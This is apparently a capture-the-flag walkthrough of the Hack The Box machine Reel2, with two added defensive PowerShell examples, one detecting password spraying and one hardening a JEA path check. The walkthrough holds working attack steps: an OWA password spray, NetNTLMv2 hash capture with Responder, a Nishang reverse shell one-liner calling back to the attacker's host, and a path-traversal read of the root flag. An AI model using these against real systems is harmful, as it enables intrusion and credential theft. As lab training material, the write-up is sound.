Reel2

Enumeration
As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on them.
The following nmap command scans the target machine for open ports quickly and saves the output to a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.210 -oN allPorts
-sS
TCP SYN scan. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000
nmap will try to keep the sending rate at or above 5000 packets per second.
-p-
scan the entire port range, from 1 to 65535.
-T5
insane mode, the fastest of nmap's timing templates.
-Pn
assume the host is online (skip host discovery).
-n
scan without reverse DNS resolution.
-oN
save the scan result into a file, in this case the allPorts file.
# Nmap 7.92 scan initiated Tue Sep 13 12:33:23 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.210
Nmap scan report for 10.10.10.210
Host is up (0.045s latency).
Not shown: 65519 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
443/tcp open https
5985/tcp open wsman
6001/tcp open X11:1
6002/tcp open X11:2
6004/tcp open X11:4
6005/tcp open X11:5
6006/tcp open X11:6
6007/tcp open X11:7
6008/tcp open X11:8
6010/tcp open x11
6011/tcp open x11
6012/tcp open x11
6017/tcp open xmail-ctrl
6024/tcp open x11
8080/tcp open http-proxy
# Nmap done at Tue Sep 13 12:33:49 2022 -- 1 IP address (1 host up) scanned in 26.53 seconds
Now that we know which ports are open, let's try to identify the services and versions running on them. The following command scans these ports in more depth and saves the result into a file:
nmap -sC -sV -p80,443,5985,6001,6002,6004,6005,6006,6007,6008,6010,6011,6012,6017,6024,8080 10.10.10.210 -oN targeted
-sC
performs the scan using the default set of scripts.
-sV
enables version detection.
-oN
save the scan result into a file, in this case the targeted file.
# Nmap 7.92 scan initiated Tue Sep 13 12:44:45 2022 as: nmap -sCV -p80,443,5985,6001,6002,6004,6005,6006,6007,6008,6010,6011,6012,6017,6024,8080 -oN targeted 10.10.10.210
Nmap scan report for 10.10.10.210
Host is up (0.049s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: 403 - Forbidden: Access is denied.
443/tcp open ssl/http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=Reel2
| Subject Alternative Name: DNS:Reel2, DNS:Reel2.htb.local
| Not valid before: 2020-07-30T10:12:46
|_Not valid after: 2025-07-30T10:12:46
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
|_ssl-date: 2022-09-13T10:45:54+00:00; +4s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open msrpc Microsoft Windows RPC
6006/tcp open msrpc Microsoft Windows RPC
6007/tcp open msrpc Microsoft Windows RPC
6008/tcp open msrpc Microsoft Windows RPC
6010/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6011/tcp open msrpc Microsoft Windows RPC
6012/tcp open msrpc Microsoft Windows RPC
6017/tcp open msrpc Microsoft Windows RPC
6024/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.32)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: Welcome | Wallstant
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.32
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 3s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 13 12:45:50 2022 -- 1 IP address (1 host up) scanned in 65.39 seconds
We can't access the website on port 80.

The HTTPS website shows the default IIS web server page.

If we enumerate subdirectories, we find an OWA login page.
gobuster dir -u https://10.10.10.210 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 --no-error -x txt,php -k
dir
enumerates directories or files.
-u
the target URL.
-w
path to the wordlist.
-t
number of concurrent threads, in this case 200.
-x
file extensions to search for.
-k
skips TLS certificate verification.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://10.10.10.210
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,php
[+] Timeout: 10s
===============================================================
2022/09/14 14:22:50 Starting gobuster in directory enumeration mode
===============================================================
/public (Status: 302) [Size: 147] [--> https://10.10.10.210/owa]
/exchange (Status: 302) [Size: 147] [--> https://10.10.10.210/owa]
/Public (Status: 302) [Size: 147] [--> https://10.10.10.210/owa]
/rpc (Status: 401) [Size: 13]
/owa (Status: 301) [Size: 0] [--> /owa/]
/Exchange (Status: 302) [Size: 147] [--> https://10.10.10.210/owa]
/RPC (Status: 401) [Size: 13]
/ecp (Status: 301) [Size: 148] [--> https://10.10.10.210/ecp/]
/ews (Status: 301) [Size: 148] [--> https://10.10.10.210/ews/]
/PUBLIC (Status: 302) [Size: 147] [--> https://10.10.10.210/owa]
===============================================================
2022/09/14 14:25:15 Finished
===============================================================
We'll see the login page in the /owa directory, but we don't have credentials yet.

The website on port 8080 shows a Wallstant application, which looks similar to Facebook.

Exploitation
Let's create a new account.

The main page shows a list of users.

We can get a list of all users registered in the app by searching with an empty query.
http://10.10.10.210:8080/search?q=

The following command will take all these users and put them in a file called users.
curl -s "http://10.10.10.210:8080/search?q=" | grep user_follow_box_a | sed 's/u\// /g' | tr "\"" " " | sed 's/<p>/ /g' | awk '{print $7 " " $5}' > users
gregg quimbly
joseph Moore
teresa trump
cube cube
sven svensson
alex miller
michael doe
egre55 egre55
travis scott
davis marshall
alfa8sa alfa8sa
jeff Perez
frans allen
james Martin
stig helmer
donald Johson
jhon smith
chris Thompson
kalle garcia
cube0x0 cube0x0
lee rodriguez
jenny adams
david Taylor
jim morgan
lars larsson
bob davis
charles Jackson
fred sanders
We can make variants of the dictionary with the spindrift tool. Let's add the same users to the dictionary, but in the format {f}.{last}.
spindrift users --format {f}.{last} >> users
g.quimbly
j.moore
t.trump
c.cube
s.svensson
a.miller
m.doe
e.egre55
t.scott
d.marshall
j.perez
f.allen
j.martin
s.helmer
d.johson
j.smith
c.thompson
k.garcia
c.cube0x0
l.rodriguez
j.adams
d.taylor
j.morgan
l.larsson
b.davis
c.jackson
f.sanders
On the Wallstant app there are only two posts.

The second one says that the summer of 2020 was hot.

We could try the password Summer2020 in a password spraying attack with atomizer against the OWA login page we saw earlier, using the users dictionary.
atomizer owa 10.10.10.210 "Summer2020" users
[*] Trying to find autodiscover URL
[+] Using OWA autodiscover URL: https://10.10.10.210/autodiscover/autodiscover.xml
[+] OWA domain appears to be hosted internally
[+] Got internal domain name using OWA: HTB
[*] Starting spray at 2021-01-30 12:33:56 UTC
[-] Authentication failed: HTB\jmoore:Summer2020 (Invalid credentials)
[-] Authentication failed: HTB\gquimbly:Summer2020 (Invalid credentials)
...
[+] Found credentials: HTB\s.svensson:Summer2020
...
[+] Dumped 1 valid accounts to owa_valid_accounts.txt
The password Summer2020 is valid for the s.svensson user. Let's log in on the OWA login page.
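The spray above tries one password against every name in the users list, so from the server's side it appears as many different usernames failing from a single source within a few seconds, while no single account ever accumulates enough failures to lock out. As an added example (not part of the original writeup), the following PowerShell flags that pattern in a constructed export of failed-logon records; the "time,user,source,status" layout, the thresholds and the name Find-PasswordSpray are assumptions, and the rows are made up to mirror the spray above.

```powershell
# Added example (defender side), not from the writeup. The export format below
# is constructed: "time,user,source,status" per line. The status values are the
# NTSTATUS codes Windows records in event 4625 (0xC000006A = wrong password,
# 0xC0000064 = account does not exist).
$failedLogons = @'
2022-09-14T14:40:01,j.moore,10.10.14.11,0xC000006A
2022-09-14T14:40:01,g.quimbly,10.10.14.11,0xC000006A
2022-09-14T14:40:02,t.trump,10.10.14.11,0xC000006A
2022-09-14T14:40:02,c.cube,10.10.14.11,0xC0000064
2022-09-14T14:40:03,a.miller,10.10.14.11,0xC000006A
2022-09-14T14:40:03,m.doe,10.10.14.11,0xC000006A
2022-09-14T14:40:04,e.egre55,10.10.14.11,0xC0000064
2022-09-14T14:40:04,t.scott,10.10.14.11,0xC000006A
2022-09-14T14:40:05,d.marshall,10.10.14.11,0xC000006A
2022-09-14T14:40:05,j.perez,10.10.14.11,0xC000006A
2022-09-14T14:41:10,k.svensson,10.10.14.22,0xC000006A
2022-09-14T14:45:30,k.svensson,10.10.14.22,0xC000006A
'@

function Find-PasswordSpray {
    param(
        [Parameter(Mandatory)][string[]]$Lines,
        [int]$WindowMinutes    = 5,   # how long one pass over a user list may take
        [int]$MinDistinctUsers = 8    # set above the normal rate of mistyped logons
    )
    $events = foreach ($line in $Lines) {
        if ([string]::IsNullOrWhiteSpace($line)) { continue }
        $time, $user, $source, $status = $line.Trim().Split(',')
        [pscustomobject]@{
            Time   = [datetime]::Parse($time)
            User   = $user.ToLowerInvariant()
            Source = $source
            Status = $status
        }
    }
    # A spray is one password against many accounts, so group by source and
    # count DISTINCT users per window; per-user failure counts stay low and
    # lockout thresholds are never hit, which is what makes spraying attractive.
    foreach ($bySource in ($events | Group-Object -Property Source)) {
        $sorted = @($bySource.Group | Sort-Object -Property Time)
        for ($i = 0; $i -lt $sorted.Count; $i++) {
            $start = $sorted[$i].Time
            $end   = $start.AddMinutes($WindowMinutes)
            $inWindow = @($sorted | Where-Object { $_.Time -ge $start -and $_.Time -lt $end })
            $users    = @($inWindow | ForEach-Object { $_.User } | Sort-Object -Unique)
            if ($users.Count -ge $MinDistinctUsers) {
                [pscustomobject]@{
                    Source        = $bySource.Name
                    WindowStart   = $start
                    DistinctUsers = $users.Count
                    # Names scraped from a web app include accounts that do not
                    # exist in AD (such as e.egre55 here), so "no such user"
                    # failures mixed into the burst are a second tell.
                    UnknownUsers  = @($inWindow | Where-Object Status -eq '0xC0000064').Count
                    Users         = ($users -join ', ')
                }
                break   # one alert per source; the window start is the spray start
            }
        }
    }
}

Find-PasswordSpray -Lines ($failedLogons -split "`r?`n") | Format-List
```

Only the 10.10.14.11 source crosses the threshold in the constructed data; the two k.svensson failures from 10.10.14.22 stay below it, which is the behaviour you want so that ordinary typos do not page anyone.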

As the website seems to be in Swedish, I will translate it to English with the Google Translator extension.

We could try to send an email to every available contact containing a link to an HTTP server we control. If a user clicks the link, we will see a request with some information about them. First, set up a netcat listener on port 80.
nc -lvnp 80
-l
listen mode.
-v
verbose mode.
-n
numeric-only IP, no DNS resolution.
-p
specify the port to listen on.
Now, go to the people picker and select every user.
https://10.10.10.210/owa/?ae=PreFormAction&t=IPM.Note&a=PeoplePicker

Then send an email with a link to http://10.10.14.11.

After a while, we should see a request from 10.10.10.210 on the netcat listener, with a User-Agent header of Mozilla/5.0 (Windows NT; Windows NT 6.3; en-US) WindowsPowerShell/5.1.14409.1018.
listening on [any] 80 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.210] 54392
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.3; en-US) WindowsPowerShell/5.1.14409.1018
Content-Type: application/x-www-form-urlencoded
Host: 10.10.14.11
Content-Length: 0
Connection: Keep-Alive
Something on the target is requesting a resource that doesn't exist. We could use Responder to answer the request with an NTLM authentication challenge, so that the client authenticates against it and we capture its NetNTLMv2 hash. Make sure the HTTP server is set to On in the Responder configuration file.
responder -I tun0
-I
network interface to use.
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [OFF]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.11]
Responder IPv6 [dead:beef:2::1009]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-49HJGZUL8KT]
Responder Domain Name [H6RX.LOCAL]
Responder DCE-RPC Port [48763]
[+] Listening for events...
[HTTP] Sending NTLM authentication request to 10.10.10.210
[HTTP] POST request from: ::ffff:10.10.10.210 URL: /
[HTTP] NTLMv2 Client : 10.10.10.210
[HTTP] NTLMv2 Username : htb\k.svensson
[HTTP] NTLMv2 Hash : k.svensson::htb:1cfa10872f3e3ef...
Let's try to crack the hash with john.
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
kittycat1 (k.svensson)
1g 0:00:00:04 DONE (2022-09-14 15:07) 0.2347g/s 1682p/s 1682c/s 1682C/s horoscope..emoemo
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Now that we have credentials, and since port 5985 (WinRM) is open, we could try to get a shell with evil-winrm as the k.svensson user.
evil-winrm -i 10.10.10.210 -u "k.svensson" -p "kittycat1"
-i
remote host IP address.
-u
username.
-p
password.
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS The term 'Invoke-Expression' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. + CategoryInfo : ObjectNotFound: (Invoke-Expression:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException>
But we can't execute commands, because we get an error. Since WinRM is available, there is another way to get a shell: install the powershell and gss-ntlmssp packages with apt, then open a PowerShell shell.
pwsh
PowerShell 7.2.6
Copyright (c) Microsoft Corporation.
https://aka.ms/powershell
Type 'help' to get help.
PS /home/alfa8sa>
Create a $pass secure string with the password kittycat1.
$pass = ConvertTo-SecureString 'kittycat1' -AsPlainText -Force
Create a $cred object with the htb\k.svensson username and the $pass secure string.
$cred = New-Object System.Management.Automation.PSCredential('htb\k.svensson', $pass)
Finally, use Enter-PSSession to get a shell.
Enter-PSSession -Computer 10.10.10.210 -credential $cred -Authentication Negotiate
[10.10.10.210]: PS>whoami
The term 'whoami.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
But we still can't execute commands. That's because we are in a ConstrainedLanguage shell.
$ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
We can only execute the following commands.
Get-Command
CommandType Name Version Source
----------- ---- ------- ------
Function Clear-Host
Function Exit-PSSession
Function Get-Command
Function Get-FormatData
Function Get-Help
Function Measure-Object
Function Out-Default
Function Select-Object
But we can bypass this restriction by defining functions or by using the & call operator.
function getlocation {Get-Location}; getlocation
Path
----
C:\Users\k.svensson\Documents
Let's get a proper shell. First, let's set up a netcat listener on port 4444 with rlwrap.
rlwrap nc -lvnp 4444
-l
listen mode.
-v
verbose mode.
-n
numeric-only IP, no DNS resolution.
-p
specify the port to listen on.
Now, I will make a file called shell with the TCP reverse shell one liner from the Nishang GitHub repository.
nano shell
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.11',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Then, encode the content as UTF-16LE and then as base64.
cat shell | iconv -t utf-16le | base64 -w 0
If we execute the encoded string with PowerShell using the -enc argument, we should get a normal shell as the user.
& {powershell -enc JABjA...kACgA=}
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.210] 23245
PS C:\Users\k.svensson\Documents> whoami
htb\k.svensson
PS C:\Users\k.svensson\Documents> type \users\k.svensson\desktop\user.txt
545fc9d141cd31578f03049409c68e65
Privilege Escalation
In the current directory there are a few configuration files.
dir \Users\k.svensson\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/30/2020 5:14 PM WindowsPowerShell
-a---- 7/31/2020 11:58 AM 5600 jea_test_account.psrc
-a---- 7/31/2020 11:58 AM 2564 jea_test_account.pssc
If we check the jea_test_account.psrc file, we'll see a function called Check-File which reads the content of files under C:\ProgramData\.
type jea_test_account.psrc | Select-String -NotMatch "^#"
...
FunctionDefinitions = @{
'Name' = 'Check-File'
'ScriptBlock' = {param($Path,$ComputerName=$env:COMPUTERNAME) [bool]$Check=$Path -like "D:\*" -or $Path -like
"C:\ProgramData\*" ; if($check) {get-content $Path}} }
...
As we can see, jea_test_account is a user.
net user
-------------------------------------------------------------------------------
a.miller Administrator b.davis
c.jackson d.johson d.marshall
d.taylor e.marin f.allen
f.sanders g.quimbly Guest
j.adams j.johson j.marin
j.moore j.morgan j.perez
j.smith jea_test_account k.garcia
k.jackson k.svensson krbtgt
l.larsson l.rodriguez m.doe
m.moore r.jackson r.martin
r.tayor r.thompson s.helmer
s.mooire s.svensson SM_b1017128ac394c669
SM_b7973ae6f38e4d1b8 SM_d8c9a1c1fce54bca9 SM_fffa25e273cb4e9bb
t.martin t.scott t.trump
w.thompson
The command completed with one or more errors.
This might be handy later. In the Desktop folder there is a Sticky Notes.lnk file, so let's look for credentials in the default Sticky Notes path.
cd \users\k.svensson\appdata\roaming\stickynotes
If we search recursively for the user jea_test_account, we'll see that there are credentials inside the Local Storage\leveldb\000003.log file.
dir -recurse | select-string "jea_test_account"
...
<p>Credentials for JEA</p><p>jea_test_account:Ab!Q@vcg^%@#1</p>
...
Let's try to get a shell as the user jea_test_account, the same way we did with k.svensson.
pwsh
$pass = ConvertTo-SecureString 'Ab!Q@vcg^%@#1' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\jea_test_account', $pass)
Enter-PSSession -Computer 10.10.10.210 -credential $cred -Authentication Negotiate
Enter-PSSession: Connecting to remote server 10.10.10.210 failed with the following error message : ERROR_ACCESS_DENIED: Access is denied. For more information, see the about_Remote_Troubleshooting Help topic.
But we get an error. This is likely because we have to connect to the JEA session configuration we saw earlier, by passing its name with -ConfigurationName.
Enter-PSSession -Computer 10.10.10.210 -credential $cred -Authentication Negotiate -ConfigurationName jea_test_account
[10.10.10.210]: PS>whoami
The term 'whoami.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
Now we get a shell, but we still can't execute normal commands. If we list the commands we are able to use, we'll see the Check-File function from the configuration file.
Get-Command
CommandType Name Version Source
----------- ---- ------- ------
Function Check-File
Function Clear-Host
Function Exit-PSSession
Function Get-Command
Function Get-FormatData
Function Get-Help
Function Measure-Object
Function Out-Default
Function Select-Object
With the Check-File command we can read the content of files under C:\ProgramData\, but since the path check is only a prefix match on the string, we can use a directory path traversal to reach the root flag. All we have to do is execute the following command and take the root flag.
Check-File C:\ProgramData\..\Users\Administrator\Desktop\root.txt
2b4428ee3230ba53282e255244aad8d8
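Check-File reads the file only after a wildcard prefix test on the raw string, so a path containing .. passes the test and Get-Content opens a file outside C:\ProgramData\, with whatever rights the JEA endpoint grants (enough to read the Administrator's desktop here). The following is an added example, not the role capability from the box: the original check reproduced beside a hardened version that canonicalises the path before comparing it. Test-AllowedPath and Get-AllowedFileContent are names chosen here, the sample paths are constructed, and the code is meant to run on the Windows endpoint, where GetFullPath treats backslashes as separators.

```powershell
# Added example; the first function is reproduced from jea_test_account.psrc,
# the hardened functions are new (their names are assumptions).

# Vulnerable: -like tests the raw string, so "C:\ProgramData\..\Users\x" matches
# "C:\ProgramData\*" even though Get-Content resolves it to C:\Users\x.
function Check-File {
    param($Path, $ComputerName = $env:COMPUTERNAME)
    [bool]$Check = $Path -like "D:\*" -or $Path -like "C:\ProgramData\*"
    if ($Check) { Get-Content $Path }
}

# Hardened: decide on the canonical path, the one that will actually be opened.
function Test-AllowedPath {
    param([Parameter(Mandatory)][string]$Path)
    $allowedRoots = @('D:\', 'C:\ProgramData\')
    # GetFullPath collapses "." and ".." segments and normalises separators.
    $full = [System.IO.Path]::GetFullPath($Path)
    foreach ($root in $allowedRoots) {
        # The trailing separator in $root stops "C:\ProgramData.evil\x" from matching.
        if ($full.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) {
            return $true
        }
    }
    return $false
}

function Get-AllowedFileContent {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-AllowedPath -Path $Path)) {
        throw "Refused: '$Path' resolves outside the allowed roots."
    }
    # -LiteralPath keeps wildcard characters in the path from being expanded, and
    # the canonical form is what gets opened, so no second parse can disagree.
    # GetFullPath is purely lexical and does not follow junctions or symlinks;
    # keep the allowed roots free of attacker-writable directories.
    Get-Content -LiteralPath ([System.IO.Path]::GetFullPath($Path))
}

# Constructed inputs: the traversal path used on this box and a legitimate one.
$traversal  = 'C:\ProgramData\..\Users\Administrator\Desktop\root.txt'
$legitimate = 'C:\ProgramData\SomeApp\config.json'

# The raw-string test accepts the traversal; the canonical test rejects it
# while still accepting the legitimate path.
$traversal -like 'C:\ProgramData\*'
Test-AllowedPath -Path $traversal
Test-AllowedPath -Path $legitimate
```

In a role capability the fix belongs inside the function's ScriptBlock, since JEA exposes the function as-is; restricting what the endpoint's run-as identity can read is a second, independent layer.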